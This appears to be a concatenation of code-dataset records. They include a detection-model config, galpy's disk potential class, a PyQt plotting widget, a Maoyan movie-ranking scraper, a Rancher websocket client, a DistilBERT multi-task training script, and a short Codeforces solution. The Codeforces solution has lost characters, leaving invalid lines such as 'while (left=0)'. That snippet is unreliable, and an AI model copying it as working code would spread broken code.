self.frcnn_mode = True\n\n if self.model == 'retina_net' or self.model == 'retina_unet' or self.model == 'prob_detector':\n # implement extra anchor-scales according to retina-net publication.\n self.rpn_anchor_scales['xy'] = [[ii[0], ii[0] * (2 ** (1 / 3)), ii[0] * (2 ** (2 / 3))] for ii in\n self.rpn_anchor_scales['xy']]\n self.rpn_anchor_scales['z'] = [[ii[0], ii[0] * (2 ** (1 / 3)), ii[0] * (2 ** (2 / 3))] for ii in\n self.rpn_anchor_scales['z']]\n self.n_anchors_per_pos = len(self.rpn_anchor_ratios) * 3\n\n self.n_rpn_features = 256 if self.dim == 2 else 64\n\n # pre-selection of detections for 
NMS-speedup. per entire batch.\n self.pre_nms_limit = 10000 if self.dim == 2 else 50000\n\n # anchor matching iou is lower than in Mask R-CNN according to https://arxiv.org/abs/1708.02002\n self.anchor_matching_iou = 0.5\n\n # if 'True', seg loss distinguishes all classes, else only foreground vs. background (class agnostic).\n self.num_seg_classes = 3 if self.class_specific_seg_flag else 2\n\n if self.model == 'retina_unet':\n self.operate_stride1 = True\n","sub_path":"experiments/toy_exp/configs.py","file_name":"configs.py","file_ext":"py","file_size_in_byte":15348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"580713425","text":"def solve():\r\n n = int(input())\r\n left = 0\r\n right = n-1\r\n a = list(map(int,input().split()))\r\n\r\n while (left=0) and left<=right:\r\n if left==right:\r\n print(a[left],end='')\r\n else:\r\n if left=0:\r\n print(a[right],' ',end='')\r\n left+=1\r\n right-=1\r\n print()\r\n\r\nif __name__ == '__main__':\r\n t = int(input())\r\n for _ in range(t):\r\n solve()\r\n","sub_path":"codeforces/1462/A.py","file_name":"A.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"307489377","text":"###############################################################################\n# CosmphiDiskPotential: cos(mphi) potential\n###############################################################################\nimport numpy\n\nfrom ..util import conversion\nfrom .planarPotential import planarPotential\n\n_degtorad = numpy.pi / 180.0\n\n\nclass CosmphiDiskPotential(planarPotential):\n \"\"\"Class that implements the disk potential\n\n .. math::\n\n \\\\Phi(R,\\\\phi) = \\\\mathrm{amp}\\\\,\\\\phi_0\\\\,\\\\,\\\\cos\\\\left[m\\\\,(\\\\phi-\\\\phi_b)\\\\right]\\\\times \\\\begin{cases}\n \\\\left(\\\\frac{R}{R_1}\\\\right)^p\\\\,, & \\\\text{for}\\\\ R \\\\geq R_b\\\\\\\\\n \\\\left[2-\\\\left(\\\\frac{R_b}{R}\\\\right)^p\\\\right]\\\\times\\\\left(\\\\frac{R_b}{R_1}\\\\right)^p\\\\,, & \\\\text{for}\\\\ R\\\\leq R_b.\n \\\\end{cases}\n\n This potential can be grown between :math:`t_{\\\\mathrm{form}}` and :math:`t_{\\\\mathrm{form}}+T_{\\\\mathrm{steady}}` in a similar way as DehnenBarPotential by wrapping it with a DehnenSmoothWrapperPotential\n\n \"\"\"\n\n def __init__(\n self,\n amp=1.0,\n phib=25.0 * _degtorad,\n p=1.0,\n phio=0.01,\n m=4,\n r1=1.0,\n rb=None,\n cp=None,\n sp=None,\n ro=None,\n vo=None,\n ):\n \"\"\"\n NAME:\n\n __init__\n\n PURPOSE:\n\n initialize an cosmphi disk potential\n\n INPUT:\n\n amp= amplitude to be applied to the potential (default:\n 1.), degenerate with phio below, but kept for overall\n consistency with potentials\n\n m= cos( m * (phi - phib) ), integer\n\n p= power-law index of the phi(R) = (R/Ro)^p part\n\n r1= (1.) 
normalization radius for the amplitude (can be Quantity); amp x phio is only the potential at (R,phi) = (r1,pib) when r1 > rb; otherwise more complicated\n\n rb= (None) if set, break radius for power-law: potential R^p at R > Rb, R^-p at R < Rb, potential and force continuous at Rb\n\n\n Either:\n\n a) phib= angle (in rad; default=25 degree; or can be Quantity)\n\n phio= potential perturbation (in terms of phio/vo^2 if vo=1 at Ro=1; or can be Quantity with units of velocity-squared)\n\n b) cp, sp= m * phio * cos(m * phib), m * phio * sin(m * phib); can be Quantity with units of velocity-squared)\n\n OUTPUT:\n\n (none)\n\n HISTORY:\n\n 2011-10-27 - Started - Bovy (IAS)\n\n 2017-09-16 - Added break radius rb - Bovy (UofT)\n\n \"\"\"\n planarPotential.__init__(self, amp=amp, ro=ro, vo=vo)\n phib = conversion.parse_angle(phib)\n r1 = conversion.parse_length(r1, ro=self._ro)\n rb = conversion.parse_length(rb, ro=self._ro)\n phio = conversion.parse_energy(phio, vo=self._vo)\n cp = conversion.parse_energy(cp, vo=self._vo)\n sp = conversion.parse_energy(sp, vo=self._vo)\n # Back to old definition\n self._r1p = r1**p\n self._amp /= self._r1p\n self.hasC = False\n self._m = int(m) # make sure this is an int\n if cp is None or sp is None:\n self._phib = phib\n self._mphio = phio * self._m\n else:\n self._mphio = numpy.sqrt(cp * cp + sp * sp)\n self._phib = numpy.arctan(sp / cp) / self._m\n if m < 2.0 and cp < 0.0:\n self._phib = numpy.pi + self._phib\n self._p = p\n if rb is None:\n self._rb = 0.0\n self._rbp = 1.0 # never used, but for p < 0 general expr fails\n self._rb2p = 1.0\n else:\n self._rb = rb\n self._rbp = self._rb**self._p\n self._rb2p = self._rbp**2.0\n self._mphib = self._m * self._phib\n self.hasC = True\n self.hasC_dxdv = True\n\n def _evaluate(self, R, phi=0.0, t=0.0):\n \"\"\"\n NAME:\n _evaluate\n PURPOSE:\n evaluate the potential at R,phi,t\n INPUT:\n R - Galactocentric cylindrical radius\n phi - azimuth\n t - time\n OUTPUT:\n Phi(R,phi,t)\n HISTORY:\n 2011-10-19 - Started - Bovy (IAS)\n \"\"\"\n if R < self._rb:\n return (\n self._mphio\n / self._m\n * numpy.cos(self._m * phi - self._mphib)\n * self._rbp\n * (2.0 * self._r1p - self._rbp / R**self._p)\n )\n else:\n return (\n self._mphio\n / self._m\n * R**self._p\n * numpy.cos(self._m * phi - self._mphib)\n )\n\n def _Rforce(self, R, phi=0.0, t=0.0):\n \"\"\"\n NAME:\n _Rforce\n PURPOSE:\n evaluate the radial force for this potential\n INPUT:\n R - Galactocentric cylindrical radius\n phi - azimuth\n t - time\n OUTPUT:\n the radial force\n HISTORY:\n 2011-10-19 - Written - Bovy (IAS)\n \"\"\"\n if R < self._rb:\n return (\n -self._p\n * self._mphio\n / self._m\n * self._rb2p\n / R ** (self._p + 1.0)\n * numpy.cos(self._m * phi - self._mphib)\n )\n else:\n return (\n -self._p\n * self._mphio\n / self._m\n * R ** (self._p - 1.0)\n * numpy.cos(self._m * phi - self._mphib)\n )\n\n def _phitorque(self, R, phi=0.0, t=0.0):\n \"\"\"\n NAME:\n _phitorque\n PURPOSE:\n evaluate the azimuthal torque for this potential\n INPUT:\n R - Galactocentric cylindrical radius\n phi - azimuth\n t - time\n OUTPUT:\n the azimuthal torque\n HISTORY:\n 2011-10-19 - Written - Bovy (IAS)\n \"\"\"\n if R < self._rb:\n return (\n self._mphio\n * numpy.sin(self._m * phi - self._mphib)\n * self._rbp\n * (2.0 * self._r1p - self._rbp / R**self._p)\n )\n else:\n return self._mphio * R**self._p * numpy.sin(self._m * phi - self._mphib)\n\n def _R2deriv(self, R, phi=0.0, t=0.0):\n if R < self._rb:\n return (\n -self._p\n * (self._p + 1.0)\n * self._mphio\n / self._m\n 
* self._rb2p\n / R ** (self._p + 2.0)\n * numpy.cos(self._m * phi - self._mphib)\n )\n else:\n return (\n self._p\n * (self._p - 1.0)\n / self._m\n * self._mphio\n * R ** (self._p - 2.0)\n * numpy.cos(self._m * phi - self._mphib)\n )\n\n def _phi2deriv(self, R, phi=0.0, t=0.0):\n if R < self._rb:\n return (\n -self._m\n * self._mphio\n * numpy.cos(self._m * phi - self._mphib)\n * self._rbp\n * (2.0 * self._r1p - self._rbp / R**self._p)\n )\n else:\n return (\n -self._m\n * self._mphio\n * R**self._p\n * numpy.cos(self._m * phi - self._mphib)\n )\n\n def _Rphideriv(self, R, phi=0.0, t=0.0):\n if R < self._rb:\n return (\n -self._p\n * self._mphio\n / self._m\n * self._rb2p\n / R ** (self._p + 1.0)\n * numpy.sin(self._m * phi - self._mphib)\n )\n else:\n return (\n -self._p\n * self._mphio\n * R ** (self._p - 1.0)\n * numpy.sin(self._m * phi - self._mphib)\n )\n\n\nclass LopsidedDiskPotential(CosmphiDiskPotential):\n \"\"\"Class that implements the disk potential\n\n .. math::\n\n \\\\Phi(R,\\\\phi) = \\\\mathrm{amp}\\\\,\\\\phi_0\\\\,\\\\left(\\\\frac{R}{R_1}\\\\right)^p\\\\,\\\\cos\\\\left(\\\\phi-\\\\phi_b\\\\right)\n\n Special case of CosmphiDiskPotential with m=1; see documentation for CosmphiDiskPotential\n \"\"\"\n\n def __init__(\n self,\n amp=1.0,\n phib=25.0 * _degtorad,\n p=1.0,\n phio=0.01,\n r1=1.0,\n cp=None,\n sp=None,\n ro=None,\n vo=None,\n ):\n CosmphiDiskPotential.__init__(\n self, amp=amp, phib=phib, p=p, phio=phio, m=1.0, cp=cp, sp=sp, ro=ro, vo=vo\n )\n self.hasC = True\n self.hasC_dxdv = True\n","sub_path":"galpy/potential/CosmphiDiskPotential.py","file_name":"CosmphiDiskPotential.py","file_ext":"py","file_size_in_byte":8553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"562347113","text":"import matplotlib\nmatplotlib.use(\"Qt5Agg\") # 声明使用QT5\nfrom matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas\nfrom matplotlib.backends.backend_qt5 import NavigationToolbar2QT as NavigationToolbar\nfrom matplotlib.figure import Figure\nfrom matplotlib import pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nimport matplotlib.image as mpimg\nfrom PyQt5 import QtCore, QtWidgets\nimport numpy as np\nimport sys\nimport cv2\n\n\nclass MyD3DCanvas(FigureCanvas):\n\tdef __init__(self, parent=None, width=5, height=4, dpi=100):\n\t\t\n\t\tplt.rcParams['font.family'] = ['SimHei']\n\t\tplt.rcParams['axes.unicode_minus'] = False\n\t\t\n\t\tself.fig = Figure(figsize=(width, height), dpi=dpi)\n\t\t\n\t\tsuper().__init__(self.fig)\n\t\tself.setParent(parent)\n\t\t\n\t\tself.setSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)\n\t\tself.updateGeometry()\n\t\t\n\tdef start_static_plot(self, picture, flag='gray'):\n\t\t\n\t\tif flag == 'gray':\n\t\t\t\n\t\t\tself.fig.suptitle('灰度图像')\n\t\t\tself.fig.figimage(picture, resize=True)\n\t\t\t\n\t\telif flag == 'D3D':\n\t\t\t\n\t\t\tself.fig.suptitle('3D图像')\n\t\t\tself.axes = self.fig.add_subplot(1, 1, 1, projection='3d')\n\t\t\tself.D3D = picture.copy()\n\t\t\tself.axes.set_xticks(np.arange(0, 80, 13))\n\t\t\tself.axes.set_xticklabels(np.arange(0, 601, 100))\n\t\t\tself.axes.set_yticks(np.arange(0, 61, 12))\n\t\t\tself.axes.set_yticklabels(np.arange(0, 501, 100))\n\t\t\tself.pictureheight3D, self.picturewidth3D = self.D3D.shape[:2]\n\t\t\tself.x3D = np.arange(0, self.picturewidth3D, 1)\n\t\t\tself.y3D = np.arange(0, self.pictureheight3D, 1)\n\t\t\tself.x3D, self.y3D = np.meshgrid(self.x3D, self.y3D)\n\t\t\tself.D3D = cv2.flip(self.D3D, 
0)\n\t\t\tprint(self.pictureheight3D, self.picturewidth3D)\n\t\t\tself.axes.plot_surface(self.x3D, self.y3D, self.D3D[self.y3D, self.x3D], rstride=2, cstride=2,\n\t\t\t cmap='rainbow')\n\t\t\n\t\telif flag == 'contour':\n\t\t\t\n\t\t\tself.fig.suptitle('等温线图像')\n\t\t\tself.axes = self.fig.add_subplot(1, 1, 1)\n\t\t\tself.contour = picture.copy()\n\t\t\tself.pictureheight, self.picturewidth = self.contour.shape[:2]\n\t\t\tself.xcontour = np.arange(0, self.picturewidth, 1)\n\t\t\tself.ycontour = np.arange(0, self.pictureheight, 1)\n\t\t\tself.xcontour, self.ycontour = np.meshgrid(self.xcontour, self.ycontour)\n\t\t\tself.contour = cv2.flip(self.contour, 0)\n\t\t\tself.contourline = self.axes.contour(self.xcontour, self.ycontour, self.contour[self.ycontour, self.xcontour],\n\t\t\t 10, colors='black', linewidths=1)\n\t\t\tself.axes.clabel(self.contourline, inline=True, inline_spacing=5, fontsize=10, fmt='%.1f')\n\t\t\tself.axes.contourf(self.xcontour, self.ycontour, self.contour[self.ycontour, self.xcontour], 10, cmap='rainbow')\n\t\t\t\n\t\t\n\t\telif flag == 'original':\n\t\t\t\n\t\t\tself.fig.suptitle('原始图像')\n\t\t\tself.fig.figimage(picture, resize=True)\n\t\t\nclass MyD3DWidget(QtWidgets.QDialog):\n\t\n\tdef __init__(self, parent=None, picture=None):\n\t\tsuper().__init__(parent)\n\t\tself.picture = picture\n\t\tself.initUi()\n\t\tself.connectEmit()\n\t\tself.retranslateUi()\n\t\t\n\tdef initUi(self):\n\n\t\tself.layout = QtWidgets.QVBoxLayout(self)\n\t\tself.mpl = MyD3DCanvas(self)\n\t\tself.mpl.resize(QtCore.QSize(720, 576))\n\t\tself.mpl.setMinimumSize(QtCore.QSize(720, 576))\n\t\tself.mpl.setMaximumSize(QtCore.QSize(720, 576))\n\t\t\n\t\tself.layout.addWidget(self.mpl)\n\t\t\n\t\tself.toolbar = NavigationToolbar(self.mpl, self)\n\t\tself.layout.addWidget(self.toolbar)\n\t\t\n\t\t'''\n\t\tself.horizontalLayout = QtWidgets.QHBoxLayout(self)\n\t\tself.save_button = QtWidgets.QPushButton(self)\n\t\tself.save_button.setObjectName(\"save\")\n\t\tself.horizontalLayout.addWidget(self.save_button)\n\t\tself.enlarge_button = QtWidgets.QPushButton(self)\n\t\tself.enlarge_button.setObjectName(\"enlarge\")\n\t\tself.horizontalLayout.addWidget(self.enlarge_button)\n\t\tself.return_button = QtWidgets.QPushButton(self)\n\t\tself.return_button.setObjectName(\"pull\")\n\t\tself.horizontalLayout.addWidget(self.return_button)\n\t\tself.layout.addLayout(self.horizontalLayout)\n\t\t'''\n\t\t\n\tdef connectEmit(self):\n\t\t# self.save_button.clicked.connect(self.save_figure)\n\t\tpass\n\t\t\n\tdef retranslateUi(self):\n\t\t\n\t\t__translation = QtCore.QCoreApplication.translate\n\t\tself.setWindowTitle(__translation(' ', '3D图像'))\n\t\t\n\t\t'''\n\t\tself.save_button.setText(__translation(' ', '保存'))\n\t\tself.enlarge_button.setText(__translation(' ', '放大'))\n\t\tself.return_button.setText(__translation(' ', '还原'))\n\t\t'''\n\t\t\n\t\t'''\n\tdef save_figure(self):\n\t\t\n\t\tself.save_widget = QtWidgets.QFileDialog()\n\t\tself.save_widget.setAcceptMode(QtWidgets.QFileDialog.AcceptSave)\n\t\tself.save_widget.setWindowTitle('请选择保存路径')\n\t\tself.save_widget.setNameFilter('image files(*.png)')\n\t\t\n\t\tif self.save_widget.exec():\n\t\t\tself.save_name = self.save_widget.selectedFiles()[0]\n\t\t\tself.save_url = self.save_widget.selectedUrls()\n\t\t\tprint(self.save_url, self.save_name)\n\t\t\tself.mpl.fig.savefig(self.save_name)\n\t\telse:\n\t\t\treturn\n\t\t'''\nif __name__ == '__main__':\n\t\n\tapp = QtWidgets.QApplication(sys.argv)\n\timage = mpimg.imread('mask.png')\n\tui = 
MyD3DWidget(picture=image)\n\tui.show()\n\tsys.exit(app.exec())\n\t","sub_path":"D3DWindow.py","file_name":"D3DWindow.py","file_ext":"py","file_size_in_byte":5017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"266670146","text":"#coding = utf-8\nimport re\nimport json\nfrom selenium import webdriver\nimport time\n\n\ndef get_one_page(url):\n\toption = webdriver.ChromeOptions()\n\toption.add_argument(\"headless\")\n\tbrowser = webdriver.Chrome(chrome_options=option)\n\tbrowser.get(url)\n\treturn browser.page_source\n\ndef parse_one_page(html):\n\tpattern = re.compile('
<dd>.*?board-index.*?>(\d+)</i>.*?data-src="(.*?)".*?alt="(.*?)".*?class="star">(.*?)</p>.*?"releasetime">(.*?)</p>.*?"integer">(.*?)</i>.*?"fraction">(.*?)</i>.*?</dd>
    ',re.S)\n\n\titems = re.findall(pattern,html)\n\n\tfor item in items:\n\t\tyield{\n\t\t\t \"index\":item[0].strip(),\n\t\t\t \"image\": item[1].strip(),\n\t\t\t \"title\":item[2].strip(),\n\t\t\t \"actor\":item[3].strip()[3:],\n\t\t\t \"time\":item[4].strip()[5:],\n\t\t\t \"score\":item[5]+item[6]\n\t\t}\n\ndef write_to_file(content,filename):\n\twith open(filename,'a',encoding='UTF-8') as file:\n\t\tfile.write(json.dumps(content,ensure_ascii=False)+'\\n')\n\t\tfile.close()\ndef main(offset):\n\n\turl = 'http://maoyan.com/board/4?offset=' + str(offset)\n\thtml = get_one_page(url)\n\tfor item in parse_one_page(html):\n\t\tprint(item)\n\t\twrite_to_file(item,\"Results\\\\MaoYanTop100SP.txt\")\n\nif __name__ == '__main__':\n\tstart_time = time.time()\n\tfor i in range(10):\n\t\tmain(i*10)\n\telapsed = time.time()-start_time\n\tprint(\"RuningTime:\",elapsed,\"s\")","sub_path":"MaoYanspiderSingleProcesses.py","file_name":"MaoYanspiderSingleProcesses.py","file_ext":"py","file_size_in_byte":1271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"345959490","text":"from base64 import b64encode\ntry:\n # Python 3\n from urllib.parse import urljoin\nexcept (ImportError) as e:\n # Python 2\n from urlparse import urljoin\n\nimport websocket\n\nfrom .common import CattleObject\n\n\nclass Subscribe(CattleObject):\n object_url = 'subscribe'\n\n def __init__(self, environment, event_names='resource.change', on_open = None, on_message = None, on_error = None, on_close = None):\n self.env = environment\n self.event_names = event_names\n self.service_url = '{}?eventNames={}'.format(self.object_url, self.event_names)\n\n # Callbacks\n self.on_open = on_open\n self.on_message = on_message\n self.on_error = on_error\n self.on_close = on_close\n\n # Websocket\n url = urljoin(self.env.endpoint, self.service_url)\n url = url.replace('http://', 'ws://').replace('https://', 'wss://')\n self.ws = websocket.WebSocketApp(url,\n header=[\"Authorization: Basic \" + b64encode(b':'.join(self.env.auth)).strip()],\n on_message = self.on_message,\n on_error = self.on_error,\n on_close = self.on_close,\n on_open=self.on_open)\n\n def connect(self, ping_interval=5):\n self.ws.run_forever(ping_interval=ping_interval)\n\n def disconnect(self):\n self.ws.close()\n","sub_path":"pyranch/subscribe.py","file_name":"subscribe.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"65206095","text":"# The pre-training model, e.g. Bert, trains a substantial model as basis. 
\n# The fundamental model contains most knowledge of natural language.\n# Then, based on these knowledge, new structures are added and fine-tuned for\n# different kinds of tasks.\n# Because most knowledge is stored in the fundamental structure rather than these extra \n# structures, we try to fine-tune multiple downstream tasks together.\n# Target: A fundamental pre-training model can support multiple downstream tasks.\n# Fundamental model: Bert.\n# Downstream tasks (GLUE): \n# CoLA, SST-2, MRPC, STS-B, QQP, MNLI, QNLI, RTE, WNLI.\n# ulimit -n 2000\n\nimport os\nimport sys\nimport logging\nimport torch\nimport time\nimport numpy as np\nfrom torch import nn\nfrom downstream_distilbert import SequenceClassification\nfrom data import GlueDataArgs, DataIterator, ComputeMetrics\n# from transformers import BertConfig, BertTokenizer, BertModel\nfrom transformers import DistilBertConfig, DistilBertTokenizer, DistilBertModel\nfrom transformers import (\n # glue_compute_metrics,\n glue_tasks_num_labels\n )\n \n \nlogger = logging.getLogger(__name__)\n\n# Hyperparameters\nepochs = 20\nmodel_name=\"sst2-nmli-sstb-qnli-distilbert-frozen-mtb-3\"\nbatch_size = [44, 256, 5, 71]\nbs = 256\nbatch_size_val = [218, 200, 100, 190]\nlearning_rate_0 = 0.0001\nlearning_rate_1 = 0.2\neval_interval = 3000\nfrozen = 10000 # set 0 to prevent frozen the main model\nbert_path=\"/home/nsccgz_jiangsu/bert-models/distilbert-base-cased\"\ncache_dir = os.path.join(\"/home/nsccgz_jiangsu/djs/output\", model_name, \"cache\")\nmodel_save_dir = os.path.join(\"/home/nsccgz_jiangsu/djs/output\", model_name,\"saved_model\")\n\n\n# Define what tasks to train\ntasks = [\"SST-2\", \"MNLI\", \"STS-B\", \"QNLI\"]\n# Train 67k 393k 7k 108k\n# dev 872 20k 1.5k 5.7k\n\n\n\n# logging\nlog_format = '[%(asctime)s] %(message)s'\nlogging.basicConfig(stream=sys.stdout, level=logging.INFO,\n format=log_format, datefmt='%d %I:%M:%S')\nt = time.time()\nlocal_time = time.localtime(t)\nif not os.path.exists('./log'):\n os.mkdir('./log')\nfh = logging.FileHandler(os.path.join('log/train-{}{:02}{}'.format(local_time.tm_year % 2000, local_time.tm_mon, t)))\nfh.setFormatter(logging.Formatter(log_format))\nlogging.getLogger().addHandler(fh)\n\nuse_gpu=torch.cuda.is_available()\nif use_gpu:\n print(\"Training on GPU.\")\n\ndef main():\n \n \n \n ntasks = len(tasks)\n \n data_args = list()\n configuration = list()\n sub_models = list()\n train_iter = list()\n dev_iter = list()\n test_iter = list()\n sub_optimizer = list()\n metrics = list()\n tokenizer = DistilBertTokenizer.from_pretrained(bert_path, cache_dir=cache_dir)\n \n for i in range(ntasks): \n logger.info(\"Tasks:\" + tasks[i])\n data_args.append(GlueDataArgs(task_name=tasks[i]))\n configuration.append(DistilBertConfig.from_pretrained(bert_path, num_labels=glue_tasks_num_labels[data_args[i].task_name], \n finetuning_task=data_args[i].task_name, cache_dir = cache_dir))\n if use_gpu:\n sub_models.append(SequenceClassification(configuration[i]).cuda())\n else: \n sub_models.append(SequenceClassification(configuration[i]))\n \n train_iter.append(DataIterator(data_args[i], tokenizer=tokenizer, mode=\"train\", cache_dir=cache_dir, batch_size=batch_size[i]))\n dev_iter.append(DataIterator(data_args[i], tokenizer=tokenizer, mode=\"dev\", cache_dir=cache_dir, batch_size=batch_size_val[i]))\n \n sub_optimizer.append(torch.optim.AdamW(sub_models[i].parameters(), lr=learning_rate_0))\n \n metrics.append(ComputeMetrics(data_args[i]))\n \n logger.info(\"*** DataSet Ready ***\")\n \n if use_gpu:\n Bert_model = 
DistilBertModel.from_pretrained(bert_path, return_dict=True).cuda()\n else:\n Bert_model = DistilBertModel.from_pretrained(bert_path, return_dict=True)\n \n bert_optimizer = torch.optim.AdamW(Bert_model.parameters(), lr=learning_rate_0)\n \n \n # balaned dataset\n train_num = list() \n for i in range(ntasks):\n train_num.append(len(train_iter[i]))\n #train_nummax = \n #train_num = [x/train_nummax for x in train_num]\n #print(train_num)\n iterations = (epochs * max(train_num) // bs) + 1\n #print(iterations)\n \n sub_scheduler = list()\n for i in range(ntasks):\n sub_scheduler.append(torch.optim.lr_scheduler.LambdaLR(sub_optimizer[i], lambda step: (1.0-step/iterations) if step <= frozen else learning_rate_1)) \n Bert_scheduler = torch.optim.lr_scheduler.LambdaLR(bert_optimizer, lambda step: (1.0-step/iterations) if step <= frozen else learning_rate_1)\n \n \n for i in range(1, iterations+1):\n \n \n if i > frozen:\n for p in Bert_model.parameters():\n p.requires_grad = True\n Bert_model.train()\n elif i == frozen:\n for p in Bert_model.parameters():\n p.requires_grad = True\n Bert_model.train() \n logging.info(\"#####################################\")\n logging.info(\"Release the Traing of the Main Model.\")\n logging.info(\"#####################################\")\n else:\n for p in Bert_model.parameters():\n p.requires_grad = False\n Bert_model.eval()\n \n losses=list()\n loss_rates=list()\n for j in range(ntasks):\n sub_models[j].train()\n data = train_iter[j].next()\n \n if use_gpu:\n input_ids=data['input_ids'].cuda()\n attention_mask=data['attention_mask'].cuda()\n #token_type_ids=data['token_type_ids'].cuda()\n label=data['labels'].cuda()\n else:\n input_ids=data['input_ids']\n attention_mask=data['attention_mask']\n #token_type_ids=data['token_type_ids']\n label=data['labels']\n \n output_inter = Bert_model(input_ids=input_ids, attention_mask=attention_mask, return_dict=True) # token_type_ids=token_type_ids,\n losses.append(sub_models[j](input=output_inter, labels=label)[0])\n \n \n losssum = sum(losses).item() \n for j in range(ntasks):\n loss_rates.append(losses[j].item()/losssum)\n \n loss = 0\n printInfo = 'TOTAL/Train {}/{}, lr:{}'.format(i, iterations, Bert_scheduler.get_lr())\n for j in range(ntasks):\n loss += losses[j] * batch_size[j] * loss_rates[j]\n printInfo += ', loss{}-{:.6f}'.format(j,losses[j])\n sub_optimizer[j].zero_grad()\n \n logging.info(printInfo) \n \n if i > frozen:\n bert_optimizer.zero_grad()\n loss.backward()\n \n if i > frozen:\n bert_optimizer.step()\n \n for j in range(ntasks):\n sub_optimizer[j].step()\n sub_scheduler[j].step()\n \n Bert_scheduler.step()\n \n if (i % eval_interval == 0):\n for j in range(ntasks):\n evaluate(Bert_model, sub_models[j], dev_iter[j], batch_size_val[j], metrics[j])\n sub_models[j].save_pretrained(os.path.join(model_save_dir, \"{}-checkpoint-{:06}.pth.tar\".format(tasks[j], i)))\n Bert_model.save_pretrained(os.path.join(model_save_dir, \"{}-checkpoint-{:06}.pth.tar\".format(\"main\", i)))\n \n \n for i in range(ntasks):\n evaluate(Bert_model, sub_models[i], dev_iter[i], batch_size_val[i], metrics[i])\n sub_models[i].save_pretrained(os.path.join(model_save_dir, \"{}-checkpoint-{:06}.pth.tar\".format(tasks[j], iterations)))\n \n Bert_model.save_pretrained(os.path.join(model_save_dir, \"{}-checkpoint-{:06}.pth.tar\".format(\"main\", iterations))) \n \n \n\ndef evaluate(main_model, sub_model, dataset, bs, metrics):\n\n all_labels = []\n all_preds = []\n all_losses = []\n \n iterations = len(dataset) // bs\n \n printInfo = \"*** 
Evaluation of {:s} ***\".format(metrics.task_name)\n logging.info(printInfo)\n\n with torch.no_grad():\n for i in range(1, iterations+1):\n \n main_model.eval()\n sub_model.eval()\n data = dataset.next()\n \n if use_gpu: \n input_ids = data['input_ids'].cuda()\n attention_mask = data['attention_mask'].cuda()\n # token_type_ids = data['token_type_ids'].cuda()\n label = data['labels'].cuda()\n else:\n input_ids = data['input_ids']\n attention_mask = data['attention_mask']\n # token_type_ids = data['token_type_ids']\n label = data['labels']\n \n output_inter = main_model(input_ids=input_ids, attention_mask=attention_mask, return_dict=True)\n output = sub_model(input=output_inter, labels=label)\n loss = output[0].cpu().numpy().tolist()\n label = label.cpu().numpy().tolist()\n \n softmax_layer = torch.nn.Softmax(dim=1)\n \n if metrics.num_labels == 3: \n pred = [x.index(max(x)) for x in output.logits.cpu().numpy().tolist()]\n elif metrics.num_labels == 2:\n pred = np.round(softmax_layer(output.logits).cpu().t()[1].numpy()).tolist()\n elif metrics.num_labels == 1:\n #print(np.array(label).shape)\n pred = output.logits.cpu().t().numpy().tolist()[0]\n \n # pred = np.round(softmax_layer(output.logits).cpu().t()[1].numpy()).tolist()\n \n \n all_labels += label\n all_preds += pred\n all_losses += [loss]\n \n \n \n \n logging.info(\"loss = {:.6f}\".format(sum(all_losses)/len(all_losses)))\n \n eval_result = metrics.result(np.array(all_labels), np.array(all_preds))\n \n for i in eval_result:\n printInfo = \"{:s} = {:.6f}\".format(i, eval_result[i])\n logging.info(printInfo) \n \n \n\nif __name__ == \"__main__\":\n main()\n","sub_path":"bert-4ends/distilbert-glue-frozen-mtb.py","file_name":"distilbert-glue-frozen-mtb.py","file_ext":"py","file_size_in_byte":10174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"220089537","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Mar 7 14:25:14 2019\r\n\r\n@author: Phy\r\n\"\"\"\r\n\r\n\"\"\"\r\nCreated on Thu Jan 10 09:20:26 2019\r\n\r\nuGrid Net\r\nThe goal is to take the kml file which has highlighted polygons of \"can't build here\"\r\nareas and also an inputted generation station gps location, and determine where\r\nto place distribution poles and how to connect the distribution network together.\r\n\r\nIncluding Reliability Cost-Benefit into layout optimization\r\n\r\n@author: Phy\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nimport math as m\r\nfrom pdf2image import convert_from_path\r\nfrom PIL import Image\r\nimport time\r\nimport matplotlib.pyplot as plt\r\n\r\n#==============================================================================\r\n#Calculate Distance between GPS coordinates with Haversine Formula (returns in m)\r\ndef GPStoDistance(Lat1,Lat2,Long1,Long2):\r\n R_earth = 6371 #earth's mean radius in km\r\n a = m.sin((Lat1-Lat2)/2)**2 + m.cos(Lat1)*m.cos(Lat2)*m.sin((Long1-Long2)/2)**2\r\n c = 2*m.atan2(m.sqrt(a),m.sqrt(1-a))\r\n d = (R_earth*c)*1000 #m\r\n return d\r\n#===============================================================================\r\n\r\n\r\n#==============================================================================\r\n# Exclusion Mapper using 2nd array instead of increasing list of indexes\r\ndef ExclusionMapper1(ExclusionMap_array,reformatScaler,exclusionBuffer,d_EW_between,d_NS_between,width_new,height_new):\r\n print(\"in exclusion mapper\")\r\n #Extend the exclusions to include the buffer zone\r\n bufferArrayWidth_EW = 
